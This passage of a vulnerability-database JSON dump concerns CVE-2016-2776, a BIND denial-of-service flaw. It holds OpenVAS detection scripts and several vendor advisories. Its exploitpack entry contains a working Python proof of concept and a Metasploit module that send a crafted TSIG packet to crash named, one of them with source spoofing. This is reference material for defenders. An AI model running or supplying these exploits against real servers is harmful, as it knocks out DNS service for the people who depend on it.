{\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.8.2~0.37.rc1.48.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-12-11T19:28:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2776"], "description": "The host is installed with ISC BIND and is\n prone to denial of service vulnerability.", "modified": "2019-12-10T00:00:00", "published": "2017-01-06T00:00:00", "id": "OPENVAS:1361412562310810263", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810263", "type": "openvas", "title": "ISC BIND 'buffer.c' Assertion Failure Denial of Service Vulnerability (Linux)", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# ISC BIND 'buffer.c' Assertion Failure Denial of Service Vulnerability (Linux)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:isc:bind\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810263\");\n script_version(\"2019-12-10T15:03:15+0000\");\n script_cve_id(\"CVE-2016-2776\");\n script_bugtraq_id(93188);\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-10 15:03:15 +0000 (Tue, 10 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-01-06 12:10:51 +0530 (Fri, 06 Jan 2017)\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_name(\"ISC BIND 'buffer.c' Assertion Failure Denial of Service Vulnerability (Linux)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with ISC BIND and is\n prone to denial of service vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to the 'buffer.c' script\n in named in ISC BIND does not properly construct responses.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to cause a denial of service (assertion failure and daemon exit)\n via a crafted query.\");\n\n script_tag(name:\"affected\", value:\"ISC BIND 9 before 9.9.9-P3, 9.10.x before\n 9.10.4-P3, and 9.11.x before 9.11.0rc3.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to ISC BIND version 9.9.9-P3 or\n 9.10.4-P3 or 9.11.0rc3 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", 
value:\"https://kb.isc.org/docs/aa-01419\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"bind_version.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"isc/bind/detected\", \"Host/runs_unixoide\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"revisions-lib.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! infos = get_app_version_and_proto( cpe:CPE, port:port ) ) exit( 0 );\n\nversion = infos[\"version\"];\nproto = infos[\"proto\"];\n\nif(version =~ \"^9\\.[0-9]\\.\")\n{\n if(revcomp(a: version, b: \"9.9.9p3\") < 0)\n {\n fix = \"9.9.9-P3\";\n VULN = TRUE;\n }\n}\n\nelse if(version =~ \"^9\\.10\")\n{\n if(revcomp(a: version, b: \"9.10.4p3\") < 0)\n {\n fix = \"9.10.4-P3\";\n VULN = TRUE;\n }\n}\n\nelse if(version =~ \"^9\\.11\")\n{\n if(revcomp(a: version, b: \"9.11.0rc3\") < 0)\n {\n fix = \"9.11.0rc3\";\n VULN = TRUE;\n }\n}\n\nif(VULN)\n{\n report = report_fixed_ver(installed_version:version, fixed_version:fix);\n security_message(data:report, port:port, proto:proto);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2776"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-11-14T00:00:00", "id": "OPENVAS:1361412562310809926", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809926", "type": "openvas", "title": "Fedora Update for bind FEDORA-2016-3af8b344f1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for bind FEDORA-2016-3af8b344f1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, 
http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809926\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-11-14 18:01:08 +0530 (Mon, 14 Nov 2016)\");\n script_cve_id(\"CVE-2016-2776\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for bind FEDORA-2016-3af8b344f1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bind'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"bind on Fedora 23\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-3af8b344f1\");\n script_xref(name:\"URL\", 
value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HDNJ7526HIGRP3XBNHML2EVUZLK6EG4Y\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC23\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC23\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.10.4~2.P3.fc23\", rls:\"FC23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-01-31T18:35:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2776"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2016-09-29T00:00:00", "id": "OPENVAS:1361412562310851398", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851398", "type": "openvas", "title": "openSUSE: Security Advisory for bind (openSUSE-SU-2016:2406-1)", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied 
warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851398\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-09-29 05:43:55 +0200 (Thu, 29 Sep 2016)\");\n script_cve_id(\"CVE-2016-2776\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for bind (openSUSE-SU-2016:2406-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bind'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The nameserver bind was updated to fix a remote denial of service\n vulnerability, where a crafted packet could cause the nameserver to abort.\n (CVE-2016-2776, bsc#1000362)\n\n This update was imported from the SUSE:SLE-12-SP1:Update update project.\");\n\n script_tag(name:\"affected\", value:\"bind on openSUSE Leap 42.1, openSUSE 13.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2016:2406-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n 
script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.2\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.2\")\n{\n\n if(!isnull(res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.9.6P1~2.22.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-chrootenv\", rpm:\"bind-chrootenv~9.9.6P1~2.22.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-debuginfo\", rpm:\"bind-debuginfo~9.9.6P1~2.22.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-debugsource\", rpm:\"bind-debugsource~9.9.6P1~2.22.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.9.6P1~2.22.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.9.6P1~2.22.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-libs-debuginfo\", rpm:\"bind-libs-debuginfo~9.9.6P1~2.22.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-lwresd\", rpm:\"bind-lwresd~9.9.6P1~2.22.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-lwresd-debuginfo\", rpm:\"bind-lwresd-debuginfo~9.9.6P1~2.22.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.9.6P1~2.22.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-utils-debuginfo\", rpm:\"bind-utils-debuginfo~9.9.6P1~2.22.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-doc\", rpm:\"bind-doc~9.9.6P1~2.22.1\", 
rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-libs-32bit\", rpm:\"bind-libs-32bit~9.9.6P1~2.22.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-libs-debuginfo-32bit\", rpm:\"bind-libs-debuginfo-32bit~9.9.6P1~2.22.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:32:31", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2776"], "description": "\nISC reports:\n\nTesting by ISC has uncovered a critical error condition\n\t which can occur when a nameserver is constructing a\n\t response. A defect in the rendering of messages into\n\t packets can cause named to exit with an assertion\n\t failure in buffer.c while constructing a response\n\t to a query that meets certain criteria.\n\n", "edition": 7, "modified": "2016-10-10T00:00:00", "published": "2016-09-27T00:00:00", "id": "C8D902B1-8550-11E6-81E7-D050996490D0", "href": "https://vuxml.freebsd.org/freebsd/c8d902b1-8550-11e6-81e7-d050996490d0.html", "title": "BIND -- Remote Denial of Service vulnerability", "type": "freebsd", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "slackware": [{"lastseen": "2020-10-25T16:36:11", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2776"], "description": "New bind packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,\n14.2, and -current to fix a security issue.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/bind-9.10.4_P3-i586-1_slack14.2.txz: Upgraded.\n This update fixes a denial-of-service vulnerability. Testing by ISC has\n uncovered a critical error condition which can occur when a nameserver is\n constructing a response. 
A defect in the rendering of messages into\n packets can cause named to exit with an assertion failure in buffer.c while\n constructing a response to a query that meets certain criteria.\n For more information, see:\n https://kb.isc.org/article/AA-01419/0\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2776\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/bind-9.9.9_P3-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/bind-9.9.9_P3-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/bind-9.9.9_P3-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/bind-9.9.9_P3-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/bind-9.9.9_P3-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/bind-9.9.9_P3-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/bind-9.9.9_P3-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/bind-9.9.9_P3-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/bind-9.9.9_P3-i486-1_slack14.1.txz\n\nUpdated package for 
Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/bind-9.9.9_P3-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/bind-9.10.4_P3-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/bind-9.10.4_P3-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/bind-9.10.4_P3-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/bind-9.10.4_P3-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg bind-9.10.4_P3-i586-1_slack14.2.txz\n\nThen, restart the name server:\n\n > /etc/rc.d/rc.bind restart", "modified": "2016-09-27T19:49:07", "published": "2016-09-27T19:49:07", "id": "SSA-2016-271-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.568983", "type": "slackware", "title": "[slackware-security] bind", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:46:45", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2776"], "description": "The Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name\nSystem (DNS) protocols. BIND includes a DNS server (named); a resolver library\n(routines for applications to use when interfacing with DNS); and tools for\nverifying that the DNS server is operating correctly.\n\nSecurity Fix(es):\n\n* A denial of service flaw was found in the way BIND constructed a response to a\nquery that met certain criteria. A remote attacker could use this flaw to make\nnamed exit unexpectedly with an assertion failure via a specially crafted DNS\nrequest packet. (CVE-2016-2776)\n\nRed Hat would like to thank ISC for reporting this issue.\n", "modified": "2017-09-08T12:17:51", "published": "2016-09-28T04:00:00", "id": "RHSA-2016:1945", "href": "https://access.redhat.com/errata/RHSA-2016:1945", "type": "redhat", "title": "(RHSA-2016:1945) Important: bind97 security update", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-08-13T18:44:41", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2776"], "description": "The Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name\nSystem (DNS) protocols.
BIND includes a DNS server (named); a resolver library\n(routines for applications to use when interfacing with DNS); and tools for\nverifying that the DNS server is operating correctly.\n\nSecurity Fix(es):\n\n* A denial of service flaw was found in the way BIND constructed a response to a\nquery that met certain criteria. A remote attacker could use this flaw to make\nnamed exit unexpectedly with an assertion failure via a specially crafted DNS\nrequest packet. (CVE-2016-2776)\n\nRed Hat would like to thank ISC for reporting this issue.\n", "modified": "2018-06-06T20:24:24", "published": "2016-09-28T04:00:00", "id": "RHSA-2016:1944", "href": "https://access.redhat.com/errata/RHSA-2016:1944", "type": "redhat", "title": "(RHSA-2016:1944) Important: bind security update", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-08-13T18:45:50", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2776", "CVE-2016-2848"], "description": "The Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.\n\nSecurity Fix(es):\n\n* A denial of service flaw was found in the way BIND constructed a response to a query that met certain criteria. A remote attacker could use this flaw to make named exit unexpectedly with an assertion failure via a specially crafted DNS request packet. (CVE-2016-2776)\n\n* A denial of service flaw was found in the way BIND handled packets with malformed options. A remote attacker could use this flaw to make named exit unexpectedly with an assertion failure via a specially crafted DNS packet. 
(CVE-2016-2848)\n\nRed Hat would like to thank ISC for reporting CVE-2016-2776.", "modified": "2016-10-25T11:46:18", "published": "2016-10-25T11:38:10", "id": "RHSA-2016:2099", "href": "https://access.redhat.com/errata/RHSA-2016:2099", "type": "redhat", "title": "(RHSA-2016:2099) Important: bind security update", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:20", "description": "\nISC BIND 9 - Denial of Service", "edition": 1, "published": "2016-10-04T00:00:00", "title": "ISC BIND 9 - Denial of Service", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-2776"], "modified": "2016-10-04T00:00:00", "id": "EXPLOITPACK:09762DB0197BBAAAB6FC79F24F0D2A74", "href": "", "sourceData": "import socket\nimport struct\n\nTARGET = ('192.168.200.10', 53)\n\nQ_A = 1\nQ_TSIG = 250\nDNS_MESSAGE_HEADERLEN = 12\n\n\ndef build_bind_nuke(question=\"\\x06google\\x03com\\x00\", udpsize=512):\n query_A = \"\\x8f\\x65\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x01\" + question + int16(Q_A) + \"\\x00\\x01\"\n\n sweet_spot = udpsize - DNS_MESSAGE_HEADERLEN + 1\n tsig_rr = build_tsig_rr(sweet_spot)\n\n return query_A + tsig_rr\n\ndef int16(n):\n return struct.pack(\"!H\", n)\n\ndef build_tsig_rr(bind_demarshalled_size):\n signature_data = (\"\\x00\\x00\\x57\\xeb\\x80\\x14\\x01\\x2c\\x00\\x10\\xd2\\x2b\\x32\\x13\\xb0\\x09\"\n \"\\x46\\x34\\x21\\x39\\x58\\x62\\xf3\\xd5\\x9c\\x8b\\x8f\\x65\\x00\\x00\\x00\\x00\")\n tsig_rr_extra_fields = \"\\x00\\xff\\x00\\x00\\x00\\x00\"\n\n necessary_bytes = len(signature_data) + len(tsig_rr_extra_fields)\n necessary_bytes += 2 + 2 # length fields\n\n # from sizeof(TSIG RR) bytes conforming the TSIG RR\n # bind9 uses sizeof(TSIG RR) - 16 to build its own\n sign_name, algo_name = generate_padding(bind_demarshalled_size - necessary_bytes + 16)\n\n tsig_hdr = sign_name + int16(Q_TSIG) + tsig_rr_extra_fields\n tsig_data = algo_name + signature_data\n return tsig_hdr + 
int16(len(tsig_data)) + tsig_data\n\ndef generate_padding(n):\n max_per_bucket = [0x3f, 0x3f, 0x3f, 0x3d, 0x3f, 0x3f, 0x3f, 0x3d]\n buckets = [1] * len(max_per_bucket)\n\n min_size = len(buckets) * 2 + 2 # 2 bytes for every bucket plus each null byte\n max_size = sum(max_per_bucket) + len(buckets) + 2\n\n if not(min_size <= n <= max_size):\n raise RuntimeException(\"unsupported amount of bytes\")\n\n curr_idx, n = 0, n - min_size\n while n > 0:\n next_n = max(n - (max_per_bucket[curr_idx] - 1), 0)\n buckets[curr_idx] = 1 + n - next_n\n n, curr_idx = next_n, curr_idx + 1\n\n n_padding = lambda amount: chr(amount) + \"A\" * amount\n stringify = lambda sizes: \"\".join(map(n_padding, sizes)) + \"\\x00\"\n\n return stringify(buckets[:4]), stringify(buckets[4:])\n\nif __name__ == \"__main__\":\n bombita = build_bind_nuke()\n\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.sendto(bombita, TARGET)\n s.close()\n\n'''\n##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core'\nrequire 'timeout'\nrequire 'socket'\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Capture\n include Msf::Auxiliary::UDPScanner\n include Msf::Auxiliary::Dos\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'BIND 9 DoS CVE-2016-2776',\n 'Description' => %q{\n Denial of Service Bind 9 DNS Server CVE-2016-2776.\n Critical error condition which can occur when a nameserver is constructing a response.\n A defect in the rendering of messages into packets can cause named to exit with an\n assertion failure in buffer.c while constructing a response to a query that meets certain criteria.\n\n This assertion can be triggered even if the apparent source address isnt allowed\n to make queries.\n },\n # Research and Original PoC - msf module author\n 'Author' => [ 'Martin Rocha', 'Ezequiel Tavella', 'Alejandro Parodi', 'Infobyte 
Research Team'],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2016-2776' ],\n [ 'URL', 'http://blog.infobytesec.com/2016/10/a-tale-of-dns-packet-cve-2016-2776.html' ]\n ],\n 'DisclosureDate' => 'Sep 27 2016',\n 'DefaultOptions' => {'ScannerRecvWindow' => 0}\n ))\n\n register_options([\n Opt::RPORT(53),\n OptAddress.new('SRC_ADDR', [false, 'Source address to spoof'])\n ])\n\n deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT')\n end\n\n def check_server_status(ip, rport)\n res = \"\"\n sudp = UDPSocket.new\n sudp.send(valid_query, 0, ip, rport)\n begin\n Timeout.timeout(5) do\n res = sudp.recv(100)\n end\n rescue Timeout::Error\n end\n\n if(res.length==0)\n print_good(\"Exploit Success (Maybe, nameserver did not replied)\")\n else\n print_error(\"Exploit Failed\")\n end\n end\n\n def scan_host(ip)\n @flag_success = true\n print_status(\"Sending bombita (Specially crafted udp packet) to: \"+ip)\n scanner_send(payload, ip, rport)\n check_server_status(ip, rport)\n end\n\n def get_domain\n domain = \"\\x06\"+Rex::Text.rand_text_alphanumeric(6)\n org = \"\\x03\"+Rex::Text.rand_text_alphanumeric(3)\n get_domain = domain+org\n end\n\n def payload\n query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65\n query += \"\\x00\\x00\" # Flags: 0x0000 Standard query\n query += \"\\x00\\x01\" # Questions: 1\n query += \"\\x00\\x00\" # Answer RRs: 0\n query += \"\\x00\\x00\" # Authority RRs: 0\n query += \"\\x00\\x01\" # Additional RRs: 1\n\n # Doman Name\n query += get_domain # Random DNS Name\n query += \"\\x00\" # [End of name]\n query += \"\\x00\\x01\" # Type: A (Host Address) (1)\n query += \"\\x00\\x01\" # Class: IN (0x0001)\n\n # Aditional records. 
Name\n query += (\"\\x3f\"+Rex::Text.rand_text_alphanumeric(63))*3 #192 bytes\n query += \"\\x3d\"+Rex::Text.rand_text_alphanumeric(61)\n query += \"\\x00\"\n\n query += \"\\x00\\xfa\" # Type: TSIG (Transaction Signature) (250)\n query += \"\\x00\\xff\" # Class: ANY (0x00ff)\n query += \"\\x00\\x00\\x00\\x00\" # Time to live: 0\n query += \"\\x00\\xfc\" # Data length: 252\n\n # Algorithm Name\n query += (\"\\x3f\"+Rex::Text.rand_text_alphanumeric(63))*3 #Random 192 bytes\n query += \"\\x1A\"+Rex::Text.rand_text_alphanumeric(26) #Random 26 bytes\n query += \"\\x00\"\n\n # Rest of TSIG\n query += \"\\x00\\x00\"+Rex::Text.rand_text_alphanumeric(4) # Time Signed: Jan 1, 1970 03:15:07.000000000 ART\n query += \"\\x01\\x2c\" # Fudge: 300\n query += \"\\x00\\x10\" # MAC Size: 16\n query += Rex::Text.rand_text_alphanumeric(16) # MAC\n query += \"\\x8f\\x65\" # Original Id: 36709\n query += \"\\x00\\x00\" # Error: No error (0)\n query += \"\\x00\\x00\" # Other len: 0\n end\n\n def valid_query\n query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65\n query += \"\\x00\\x00\" # Flags: 0x0000 Standard query\n query += \"\\x00\\x01\" # Questions: 1\n query += \"\\x00\\x00\" # Answer RRs: 0\n query += \"\\x00\\x00\" # Authority RRs: 0\n query += \"\\x00\\x00\" # Additional RRs: 0\n\n # Doman Name\n query += get_domain # Random DNS Name\n query += \"\\x00\" # [End of name]\n query += \"\\x00\\x01\" # Type: A (Host Address) (1)\n query += \"\\x00\\x01\" # Class: IN (0x0001)s\n end\n\nend\n'''", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "archlinux": [{"lastseen": "2020-09-22T18:36:45", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2776"], "description": "Arch Linux Security Advisory ASA-201609-29\n==========================================\n\nSeverity: High\nDate : 2016-09-27\nCVE-ID : CVE-2016-2776\nPackage : bind\nType : denial of service\nRemote : Yes\nLink : https://wiki.archlinux.org/index.php/CVE\n\nSummary\n=======\n\nThe package bind 
